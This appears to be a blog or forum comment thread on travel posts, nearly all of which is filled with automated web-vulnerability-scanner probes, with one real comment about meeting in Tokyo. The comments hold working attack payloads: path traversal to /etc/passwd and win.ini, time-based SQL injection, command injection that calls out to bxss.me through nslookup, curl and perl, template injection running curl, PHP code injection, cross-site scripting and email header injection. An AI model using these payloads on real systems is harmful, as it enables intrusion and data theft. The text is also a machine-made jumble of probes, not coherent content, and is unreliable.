unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Just_Ingest
WEB-INF/web.xml
re: Just_Ingest
WEB-INF\web.xml
re: Just_Ingest
176LEN8LA0
re: Just_Ingest
response.write(9425583*9103991)
re: Just_Ingest
'+response.write(9425583*9103991)+'
re: Just_Ingest
"+response.write(9425583*9103991)+"
re: Just_Ingest
../../../../../../../../../../../../../../etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../windows/win.ini
re: Just_Ingest
<esi:include src="http://bxss.me/rpb.png"/>
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
${10000486+10000304}
re: Just_Ingest
../
re: Just_Ingest
)
re: Just_Ingest
redirtest.acx
re: Just_Ingest
!(()&&!|*|*|
re: Just_Ingest
^(#$!@#$)(()))******
re: Just_Ingest
echo rewvhs$()\ dnttdx\nz^xyu||a #' &echo rewvhs$()\ dnttdx\nz^xyu||a #|" &echo rewvhs$()\ dnttdx\nz^xyu||a #
re: Just_Ingest
'.gethostbyname(lc('hitrz'.'issifxey2885f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(76).chr(101).chr(65).'
re: Just_Ingest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Just_Ingest
&echo jifzji$()\ bepbqb\nz^xyu||a #' &echo jifzji$()\ bepbqb\nz^xyu||a #|" &echo jifzji$()\ bepbqb\nz^xyu||a #
re: Just_Ingest
".gethostbyname(lc("hitgb"."iakpxubkf157e.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(71).chr(103).chr(90)."
re: Just_Ingest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Just_Ingest
|echo eadzfp$()\ jotybt\nz^xyu||a #' |echo eadzfp$()\ jotybt\nz^xyu||a #|" |echo eadzfp$()\ jotybt\nz^xyu||a #
re: Just_Ingest
gethostbyname(lc('hitoc'.'klgrpqra35419.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(84).chr(102).chr(85)
re: Just_Ingest
/etc/shells
re: Just_Ingest
expr 9000451687 - 936546
re: Just_Ingest
../../../../../../../../../../../../../../etc/shells
re: Just_Ingest
(nslookup -q=cname hitxvzcbicuhea94f9.bxss.me||curl hitxvzcbicuhea94f9.bxss.me))
re: Just_Ingest
c:/windows/win.ini
re: Just_Ingest
$(nslookup -q=cname hitaytttjocgga4960.bxss.me||curl hitaytttjocgga4960.bxss.me)
re: Just_Ingest
bxss.me
re: Just_Ingest
&nslookup -q=cname hitzbxtlyoaqza67d5.bxss.me&'\"`0&nslookup -q=cname hitzbxtlyoaqza67d5.bxss.me&`'
re: Just_Ingest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Just_Ingest
Http://bxss.me/t/fit.txt
re: Just_Ingest
&(nslookup -q=cname hitkncrcyopsidd785.bxss.me||curl hitkncrcyopsidd785.bxss.me)&'\"`0&(nslookup -q=cname hitkncrcyopsidd785.bxss.me||curl hitkncrcyopsidd785.bxss.me)&`'
re: Just_Ingest
http://bxss.me/t/fit.txt?.jpg
re: Just_Ingest
|(nslookup -q=cname hitdhkidkorzsfbe2e.bxss.me||curl hitdhkidkorzsfbe2e.bxss.me)
re: Just_Ingest
'"()
re: Just_Ingest
`(nslookup -q=cname hitvpvvfoqydh59c39.bxss.me||curl hitvpvvfoqydh59c39.bxss.me)`
re: Just_Ingest
'&&sleep(27*1000)*ictwev&&'
re: Just_Ingest
;(nslookup -q=cname hitlxzdptgxewc0872.bxss.me||curl hitlxzdptgxewc0872.bxss.me)|(nslookup -q=cname hitlxzdptgxewc0872.bxss.me||curl hitlxzdptgxewc0872.bxss.me)&(nslookup -q=cname hitlxzdptgxewc0872.bxss.me||curl hitlxzdptgxewc0872.bxss.me)
re: Just_Ingest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Just_Ingest
"&&sleep(27*1000)*eukels&&"
re: Just_Ingest
|(nslookup${IFS}-q${IFS}cname${IFS}hitlykmnledyj808b2.bxss.me||curl${IFS}hitlykmnledyj808b2.bxss.me)
re: Just_Ingest
';print(md5(31337));$a='
re: Just_Ingest
'||sleep(27*1000)*ikfilh||'
re: Just_Ingest
&(nslookup${IFS}-q${IFS}cname${IFS}hitqlusbtgemz67e56.bxss.me||curl${IFS}hitqlusbtgemz67e56.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitqlusbtgemz67e56.bxss.me||curl${IFS}hitqlusbtgemz67e56.bxss.me)&`'
re: Just_Ingest
";print(md5(31337));$a="
re: Just_Ingest
"||sleep(27*1000)*zjtnlg||"
re: Just_Ingest
${@print(md5(31337))}
re: Just_Ingest
${@print(md5(31337))}\
re: Just_Ingest
HttP://bxss.me/t/xss.html?%00
re: Just_Ingest
'.print(md5(31337)).'
re: Just_Ingest
bxss.me/t/xss.html?%00
re: Just_Ingest
"+"A".concat(70-3).concat(22*4).concat(104).concat(76).concat(101).concat(77)+(require"socket"
Socket.gethostbyname("hitqe"+"mmjeyzwh38850.bxss.me.")[3].to_s)+"
re: Just_Ingest
'+'A'.concat(70-3).concat(22*4).concat(100).concat(82).concat(105).concat(74)+(require'socket'
Socket.gethostbyname('hitmd'+'ceadclcd7fd12.bxss.me.')[3].to_s)+'
re: Just_Ingest
'A'.concat(70-3).concat(22*4).concat(106).concat(88).concat(100).concat(87)+(require'socket'
Socket.gethostbyname('hitrl'+'qverwqpnca2b4.bxss.me.')[3].to_s)
re: Just_Ingest
'"
re: Just_Ingest
replies
re: Just_Ingest
<!--
re: Just_Ingest
replies�
re: Just_Ingest
replies/.
re: Just_Ingest
'"()&%<zzz><ScRiPt >TWHi(9468)</ScRiPt>
re: Just_Ingest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitcktgajkzmpd4c11.bxss.me")}}
re: Just_Ingest
'"()&%<zzz><ScRiPt >TWHi(9428)</ScRiPt>
re: Just_Ingest
9159359
re: Just_Ingest
9u60Wnt5
re: Just_Ingest
*1
re: Just_Ingest
*1
re: Just_Ingest
*1
re: Just_Ingest
*1
re: Just_Ingest
-1 OR 5*5=25 --
re: Just_Ingest
-1 OR 5*5=26 --
re: Just_Ingest
-1 OR 5*5=25
re: Just_Ingest
-1 OR 5*5=26
re: Just_Ingest
*if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
-1 waitfor delay '0:0:15' --
re: Just_Ingest
Mr8JWwJx'; waitfor delay '0:0:15' --
re: Just_Ingest
-1 OR 23=(SELECT 23 FROM PG_SLEEP(15))--
re: Just_Ingest
-1) OR 554=(SELECT 554 FROM PG_SLEEP(15))--
re: Just_Ingest
-1)) OR 740=(SELECT 740 FROM PG_SLEEP(15))--
re: Just_Ingest
NefzvPg1' OR 942=(SELECT 942 FROM PG_SLEEP(15))--
re: Just_Ingest
oaP9tNQi') OR 391=(SELECT 391 FROM PG_SLEEP(15))--
re: Just_Ingest
5dUYXGmD')) OR 449=(SELECT 449 FROM PG_SLEEP(15))--
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
'"
re: Just_Ingest
@@GpGtf
re: Just_Ingest
(select 198766*667891)
re: Just_Ingest
(select 198766*667891 from DUAL)
Afraid we'll be missing you Justin - we'll be around Tokyo for a short stint in mid February and mid March and if you or any of the other tokyotabletrip members would like to sync up I'm sure it'd be spectacular.
re: Shi
tMARFZAn
re: Shi
1*
re: Shi
1*
re: Shi
1*
re: Shi
1*
re: Shi
-1 OR 2+521-521-1=0+0+0+1
re: Shi
-1 OR 3+521-521-1=0+0+0+1
re: Shi
if(now()=sysdate(),sleep(15),0)
re: Shi
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Shi
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Shi
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Shi
-1; waitfor delay '0:0:15' --
re: Shi
-1); waitfor delay '0:0:15' --
re: Shi
1 waitfor delay '0:0:15' --
re: Shi
CJ1n0Lac'; waitfor delay '0:0:15' --
re: Shi
-5 OR 56=(SELECT 56 FROM PG_SLEEP(15))--
re: Shi
-5) OR 666=(SELECT 666 FROM PG_SLEEP(15))--
re: Shi
-1)) OR 646=(SELECT 646 FROM PG_SLEEP(15))--
re: Shi
un0twrI8' OR 377=(SELECT 377 FROM PG_SLEEP(15))--
re: Shi
mAGR1FfG') OR 471=(SELECT 471 FROM PG_SLEEP(15))--
re: Shi
miZBxipn')) OR 120=(SELECT 120 FROM PG_SLEEP(15))--
re: Shi
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Shi
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Shi
'||(select 1 from (select pg_sleep(15))x)||'
re: Shi
''||(select 1 from (select pg_sleep(15))x)||''
re: Shi
1'"
re: Shi
@@voo5m
re: Shi
1BzhsHGmnSO
re: Shi
response.write(9735176*9176113)
re: Shi
'+response.write(9735176*9176113)+'
re: Shi
%0abcc:074625.67-22311.67.e9d9c.19990.2@bxss.me
re: Shi
"+response.write(9735176*9176113)+"
re: Shi
to@example.com>%0d%0abcc:074625.67-22312.67.e9d9c.19990.2@bxss.me
re: Shi
../../../../../../../../../../../../../../etc/passwd
re: Shi
../../../../../../../../../../../../../../windows/win.ini
re: Shi
<esi:include src="http://bxss.me/rpb.png"/>
re: Shi
file:///etc/passwd
re: Shi
../../../../../../../../../../../../../../../proc/version
re: Shi
${9999072+9999004}
re: Shi
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Shi
../../../../../../../../../../etc/passwd%00.jpg
re: Shi
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Shi
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Shi
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Shi
/etc/passwd
re: Shi
%2fetc%2fpasswd
re: Shi
echo pclmsq$()\ hnvoim\nz^xyu||a #' &echo pclmsq$()\ hnvoim\nz^xyu||a #|" &echo pclmsq$()\ hnvoim\nz^xyu||a #
re: Shi
)
re: Shi
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Shi
&echo hsavmv$()\ vezhtu\nz^xyu||a #' &echo hsavmv$()\ vezhtu\nz^xyu||a #|" &echo hsavmv$()\ vezhtu\nz^xyu||a #
re: Shi
!(()&&!|*|*|
re: Shi
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Shi
|echo hnhajc$()\ uykbae\nz^xyu||a #' |echo hnhajc$()\ uykbae\nz^xyu||a #|" |echo hnhajc$()\ uykbae\nz^xyu||a #
re: Shi
^(#$!@#$)(()))******
re: Shi
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Shi
(nslookup hitkleziwwehk35536.bxss.me||perl -e "gethostbyname('hitkleziwwehk35536.bxss.me')")
re: Shi
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Shi
$(nslookup hitdjmtcgraomeeef3.bxss.me||perl -e "gethostbyname('hitdjmtcgraomeeef3.bxss.me')")
re: Shi
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Shi
&nslookup hitqcbltwyapkdab3f.bxss.me&'\"`0&nslookup hitqcbltwyapkdab3f.bxss.me&`'
re: Shi
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Shi
&(nslookup hitpovrhlwtxhb0a31.bxss.me||perl -e "gethostbyname('hitpovrhlwtxhb0a31.bxss.me')")&'\"`0&(nslookup hitpovrhlwtxhb0a31.bxss.me||perl -e "gethostbyname('hitpovrhlwtxhb0a31.bxss.me')")&`'
re: Shi
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Shi
file:///etc/passwd
re: Shi
|(nslookup hitrjcgklfuxxfa169.bxss.me||perl -e "gethostbyname('hitrjcgklfuxxfa169.bxss.me')")
re: Shi
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Shi
'.gethostbyname(lc('hitgq'.'arnwgkdy6871c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(67).chr(99).chr(68).'
re: Shi
/\../\../\../\../\../\../\../etc/passwd
re: Shi
`(nslookup hityjxbiiaonv571e3.bxss.me||perl -e "gethostbyname('hityjxbiiaonv571e3.bxss.me')")`
re: Shi
Http://bxss.me/t/fit.txt
re: Shi
".gethostbyname(lc("hitek"."vhylsfaxa6f46.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(83).chr(98).chr(83)."
re: Shi
/WEB-INF/web.xml
re: Shi
;(nslookup hitbxheldxlbse1a16.bxss.me||perl -e "gethostbyname('hitbxheldxlbse1a16.bxss.me')")|(nslookup hitbxheldxlbse1a16.bxss.me||perl -e "gethostbyname('hitbxheldxlbse1a16.bxss.me')")&(nslookup hitbxheldxlbse1a16.bxss.me||perl -e "gethostbyname('hitbxheldxlbse1a16.bxss.me')")
re: Shi
http://bxss.me/t/fit.txt%3F.jpg
re: Shi
C:\WINDOWS\system32\drivers\etc\hosts
re: Shi
/etc/shells
re: Shi
../../../../../../../../../../windows/win.ini%00.jpg
re: Shi
c:/windows/win.ini
re: Shi
bxss.me
re: Shi
/../../../../../../../../../../boot.ini
re: Shi
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Shi
..\..\..\..\..\..\..\..\windows\win.ini
re: Shi
HttP://bxss.me/t/xss.html?%00
re: Shi
"+"A".concat(70-3).concat(22*4).concat(102).concat(87).concat(101).concat(77)+(require"socket"
Socket.gethostbyname("hitpz"+"vsjjgpsq9c13e.bxss.me.")[3].to_s)+"
re: Shi
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Shi
bxss.me/t/xss.html?%00
re: Shi
'+'A'.concat(70-3).concat(22*4).concat(105).concat(77).concat(108).concat(72)+(require'socket'
Socket.gethostbyname('hitpf'+'wzetwagp9b031.bxss.me.')[3].to_s)+'
re: Shi
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Shi
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Shi
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Shi
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Shi
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Shi
';print(md5(31337));$a='
re: Shi
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.